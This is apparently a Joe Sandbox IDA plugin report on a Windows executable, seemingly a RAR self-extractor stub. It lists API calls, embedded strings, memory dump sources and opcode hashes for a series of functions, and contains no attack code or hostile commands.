                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen
                    • String ID: </p>$</style>$<br>$<style>$>
                    • API String ID: 176396367-3568243669
                    • Opcode ID: 7a1168b4e74a3b3f48a2f254e287aa04422a29e028a6bcebb0e35c0090ec4360
                    • Instruction ID: 7d7131d17556d3c39073bf44966e819bdb4e238567779a0f98a6b6001596a7a9
                    • Opcode Fuzzy Hash: 7a1168b4e74a3b3f48a2f254e287aa04422a29e028a6bcebb0e35c0090ec4360
                    • Instruction Fuzzy Hash: 2651266674432395DBB05A24885177E73E0DFE0751F68C4BBF9A88B5C0FB648D419263
                    APIs
                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B90FC2,00000000,00000000,00000000,00000000,00000000,00B865AD), ref: 00B9088F
                    • __fassign.LIBCMT ref: 00B9090A
                    • __fassign.LIBCMT ref: 00B90925
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B9094B
                    • WriteFile.KERNEL32(?,00000000,00000000,00B90FC2,00000000,?,?,?,?,?,?,?,?,?,00B90FC2,00000000), ref: 00B9096A
                    • WriteFile.KERNEL32(?,00000000,00000001,00B90FC2,00000000,?,?,?,?,?,?,?,?,?,00B90FC2,00000000), ref: 00B909A3
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 9c939685825358f49d7a7a1c305ca9b26fefdf883dd95053c30f1a5165f1d312
                    • Instruction ID: 20bb3243896f65f9effb0d123c829137cb36f43c299e526df313b048b64348d4
                    • Opcode Fuzzy Hash: 9c939685825358f49d7a7a1c305ca9b26fefdf883dd95053c30f1a5165f1d312
                    • Instruction Fuzzy Hash: 22519471A10249AFDF10DFA8DC86BEEBBF8EF19300F14416AE955E7252E7309941CB60
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00B83AC7
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00B83ACF
                    • _ValidateLocalCookies.LIBCMT ref: 00B83B58
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00B83B83
                    • _ValidateLocalCookies.LIBCMT ref: 00B83BD8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 1bd4206c38c925f9bce7818ad9a9a30cde09b07caa59128fac50adbdf090896b
                    • Instruction ID: 2ef7ddd258554c73f0224b18905feb33ce7fd30fd6fc833ab342c4a60ca499f3
                    • Opcode Fuzzy Hash: 1bd4206c38c925f9bce7818ad9a9a30cde09b07caa59128fac50adbdf090896b
                    • Instruction Fuzzy Hash: 8541AF74A00209ABCF10EF69C881A9EBBF5EF45B24F1481D5E8145B2B2D771EA05CF90
                    APIs
                    • ShowWindow.USER32(?,00000000), ref: 00B7AF0E
                    • GetWindowRect.USER32(?,?), ref: 00B7AF64
                    • ShowWindow.USER32(?,00000005,00000000), ref: 00B7B001
                    • SetWindowTextW.USER32(?,00000000), ref: 00B7B009
                    • ShowWindow.USER32(00000000,00000005), ref: 00B7B01F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Window$Show$RectText
                    • String ID: RarHtmlClassName
                    • API String ID: 3937224194-1658105358
                    • Opcode ID: 9288513328dcf346cad11f3679bfb0e971840538d56150c77e4636fedb9d5968
                    • Instruction ID: 52b1617f124a8081aadc73ae0b7d7db035e92066e4ae3bf374ca4d2cf8c1d873
                    • Opcode Fuzzy Hash: 9288513328dcf346cad11f3679bfb0e971840538d56150c77e4636fedb9d5968
                    • Instruction Fuzzy Hash: A741B171444204AFDB329F60DC4DF6B7BE8EB4C701F188599F95DAA062DB70E944CB62
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen
                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                    • API String ID: 176396367-3743748572
                    • Opcode ID: 0b4f702c7f17c1653b1e80d2f34bbb38330a867343502183a1bf7c401fd2e585
                    • Instruction ID: 851f1199d652ef8f3bd48bad12fdbe9f6f93c38d404912b8fb0aa36bac72b1e8
                    • Opcode Fuzzy Hash: 0b4f702c7f17c1653b1e80d2f34bbb38330a867343502183a1bf7c401fd2e585
                    • Instruction Fuzzy Hash: D1315B22684705A6DA70FB549C42B7E73E4EBD0320F20C46FF5A9572D0FA64AD94C3A7
                    APIs
                      • Part of subcall function 00B8DA28: _free.LIBCMT ref: 00B8DA51
                    • _free.LIBCMT ref: 00B8DAB2
                      • Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
                      • Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692
                    • _free.LIBCMT ref: 00B8DABD
                    • _free.LIBCMT ref: 00B8DAC8
                    • _free.LIBCMT ref: 00B8DB1C
                    • _free.LIBCMT ref: 00B8DB27
                    • _free.LIBCMT ref: 00B8DB32
                    • _free.LIBCMT ref: 00B8DB3D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                    • Instruction ID: 523749592d91bb9370499336dffa6ccce811cd55004614b39120c758cbdd0b0f
                    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                    • Instruction Fuzzy Hash: D2119071954B04BAE620BBB1CC07FCB77ECAF15B10F440C66B39AA60B2EA74B505C751
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B7F7F5,00B7F758,00B7F9F9), ref: 00B7F791
                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B7F7A7
                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B7F7BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                    • API String ID: 667068680-1718035505
                    • Opcode ID: 3f7611b12af36db67acdf7b698268d52b5d156514b412572fd07ab3129fe93e3
                    • Instruction ID: c691f0499bd07fe3972d55d26fb32bc56c576724531607d3b78861269d13099e
                    • Opcode Fuzzy Hash: 3f7611b12af36db67acdf7b698268d52b5d156514b412572fd07ab3129fe93e3
                    • Instruction Fuzzy Hash: B7F0C2313012235F9B344F684DC5DB633DDDA05761325C4FBEA3AD3250DA10CC4196D9
                    APIs
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B727F1
                      • Part of subcall function 00B6C619: GetVersionExW.KERNEL32(?), ref: 00B6C63E
                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B72815
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7282F
                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B72842
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B72852
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B72862
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion
                    • String ID:
                    • API String ID: 2092733347-0
                    • Opcode ID: 53139920a9fdbc5c6ed20f7a3c68cd669d8add5a4c24fbbd6008843a8ed981eb
                    • Instruction ID: 2b7597916529b9d6fdf5250c62f13286382a79e1f55ecc7370c6d4ac8feaa11b
                    • Opcode Fuzzy Hash: 53139920a9fdbc5c6ed20f7a3c68cd669d8add5a4c24fbbd6008843a8ed981eb
                    • Instruction Fuzzy Hash: 8A311775108316AFC704DFA8D88599BBBE8FF98714F009A1EF999D3210E730D549CBA6
                    APIs
                    • GetLastError.KERNEL32(?,?,00B83C81,00B83A3C,00B80BF4), ref: 00B83C98
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B83CA6
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B83CBF
                    • SetLastError.KERNEL32(00000000,00B83C81,00B83A3C,00B80BF4), ref: 00B83D11
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: a4d36f860a9b94e26977a6ca48b67773dea79926c3979de6bf08b8d205f37463
                    • Instruction ID: 889f978ca144e6d668c47b85a00975627e57fc27035e82f3db0f6628222ce199
                    • Opcode Fuzzy Hash: a4d36f860a9b94e26977a6ca48b67773dea79926c3979de6bf08b8d205f37463
                    • Instruction Fuzzy Hash: AF0188321193125EA6243674BC96A2B3BD4FB42F75F2002BAF610661F1EF655D11DB84
                    APIs
                    • GetLastError.KERNEL32(?,00BA30C4,00B85982,00BA30C4,?,?,00B853FD,?,?,00BA30C4), ref: 00B8A519
                    • _free.LIBCMT ref: 00B8A54C
                    • _free.LIBCMT ref: 00B8A574
                    • SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A581
                    • SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A58D
                    • _abort.LIBCMT ref: 00B8A593
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: f31a7019fb44fe61749af4c5b92d3d674990e4f75adb1a4b65dbc0022b44291b
                    • Instruction ID: 973ba930ac86f76ff0240f5ab7c18af9785a12fc6b1eacd52a1651402b1a9a1f
                    • Opcode Fuzzy Hash: f31a7019fb44fe61749af4c5b92d3d674990e4f75adb1a4b65dbc0022b44291b
                    • Instruction Fuzzy Hash: 1EF0A475140500A7E2153324AD1AFAB3BE9DBE2B61F24019BFA14A31B2EF358D42C766
                    APIs
                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B7ED97
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7EDB1
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7EDC2
                    • TranslateMessage.USER32(?), ref: 00B7EDCC
                    • DispatchMessageW.USER32(?), ref: 00B7EDD6
                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B7EDE1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                    • String ID:
                    • API String ID: 2148572870-0
                    • Opcode ID: ef212061fab43338c56dd46c4bc9cc3abc00908e14588559ef7eea708250fd2a
                    • Instruction ID: 3836909f027bd648f7000df9131d1e82efc978e3ac84211984f0a04d9addaa90
                    • Opcode Fuzzy Hash: ef212061fab43338c56dd46c4bc9cc3abc00908e14588559ef7eea708250fd2a
                    • Instruction Fuzzy Hash: 3AF03C72A01119ABCB306BA5EC4DDCF7E6DEF59351B108022B61AD3050DA74D586C7E0
                    APIs
                      • Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D
                      • Part of subcall function 00B6CD5C: _wcsrchr.LIBVCRUNTIME ref: 00B6CD73
                    • _wcslen.LIBCMT ref: 00B6D5A4
                    • _wcslen.LIBCMT ref: 00B6D5EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$_wcsrchr
                    • String ID: .exe$.rar$.sfx
                    • API String ID: 3513545583-31770016
                    • Opcode ID: 2dffa97b924cca58e8f7bac29861a523710c4e28d984d877ed681c85b67454a1
                    • Instruction ID: c7b78a12d8b3141904b0c35c22702ee2cbd7ea86271e46997b3d786e865c8335
                    • Opcode Fuzzy Hash: 2dffa97b924cca58e8f7bac29861a523710c4e28d984d877ed681c85b67454a1
                    • Instruction Fuzzy Hash: 2D413712E0031199C731AF38C85293B73E8EF61748B1549CEF89B5B481E7688D82C3A5
                    APIs
                    • GetTempPathW.KERNEL32(00000800,?), ref: 00B7DFE2
                      • Part of subcall function 00B6CAA0: _wcslen.LIBCMT ref: 00B6CAA6
                    • _swprintf.LIBCMT ref: 00B7E016
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    • SetDlgItemTextW.USER32(?,00000066,00BB2892), ref: 00B7E036
                    • EndDialog.USER32(?,00000001), ref: 00B7E143
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                    • String ID: %s%s%u
                    • API String ID: 110358324-1360425832
                    • Opcode ID: 008281ec90a38bb1ebd22c3fa87be409ae7b2d4cccec8dc16a4f4c70d8dbb8f6
                    • Instruction ID: 37b688bc51527770ac19b5aca203d5eaebaba8241c6e9afc8bb77484b4eaa94f
                    • Opcode Fuzzy Hash: 008281ec90a38bb1ebd22c3fa87be409ae7b2d4cccec8dc16a4f4c70d8dbb8f6
                    • Instruction Fuzzy Hash: D7414B71900218AADF219BA48C56EEA77FCEF18744F4084E6FA1DE7151EF709A84CF61
                    APIs
                    • _wcslen.LIBCMT ref: 00B6CF56
                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B6B505,?,?,00000800,?,?,00B6B4CA,?), ref: 00B6CFF4
                    • _wcslen.LIBCMT ref: 00B6D06A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$CurrentDirectory
                    • String ID: UNC$\\?\
                    • API String ID: 3341907918-253988292
                    • Opcode ID: 05481359e5fe0a9835f216e957ad4cb8c158a8d06ee31dcf8424d330f31ccf6c
                    • Instruction ID: 83ae552b28c1d919acffcd1e1f621ecb5d3476a3bcbdf30afa0e5e99fb9b4968
                    • Opcode Fuzzy Hash: 05481359e5fe0a9835f216e957ad4cb8c158a8d06ee31dcf8424d330f31ccf6c
                    • Instruction Fuzzy Hash: 3B41D632A00215BACF20AF64CC51DFA77EAEF49350F1085E5F968A3051E779DE57CA60
                    APIs
                    • LoadBitmapW.USER32(00000065), ref: 00B7C8DD
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B7C902
                    • DeleteObject.GDI32(00000000), ref: 00B7C934
                    • DeleteObject.GDI32(00000000), ref: 00B7C957
                      • Part of subcall function 00B7B6D2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6E5
                      • Part of subcall function 00B7B6D2: SizeofResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6FC
                      • Part of subcall function 00B7B6D2: LoadResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B713
                      • Part of subcall function 00B7B6D2: LockResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B722
                      • Part of subcall function 00B7B6D2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B73D
                      • Part of subcall function 00B7B6D2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B74E
                      • Part of subcall function 00B7B6D2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B7B7B7
                      • Part of subcall function 00B7B6D2: GlobalUnlock.KERNEL32(00000000), ref: 00B7B7D6
                      • Part of subcall function 00B7B6D2: GlobalFree.KERNEL32(00000000), ref: 00B7B7DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                    • String ID: ]
                    • API String ID: 1428510222-3352871620
                    • Opcode ID: 811758c1f372a8d2a9d69085de28c5102edde9ca1c7c3639d2c56eddd9166797
                    • Instruction ID: d0af624e7e9e54a5f9db3549edfeed012762392c47775e790996b8a9f2643447
                    • Opcode Fuzzy Hash: 811758c1f372a8d2a9d69085de28c5102edde9ca1c7c3639d2c56eddd9166797
                    • Instruction Fuzzy Hash: 4801D63250060567CB2227649C05F7F7EFAEF81B51F044158FE28F7292DF718C459AA1
                    APIs
                      • Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
                      • Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350
                    • EndDialog.USER32(?,00000001), ref: 00B7E79B
                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B7E7B1
                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B7E7C5
                    • SetDlgItemTextW.USER32(?,00000068), ref: 00B7E7D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
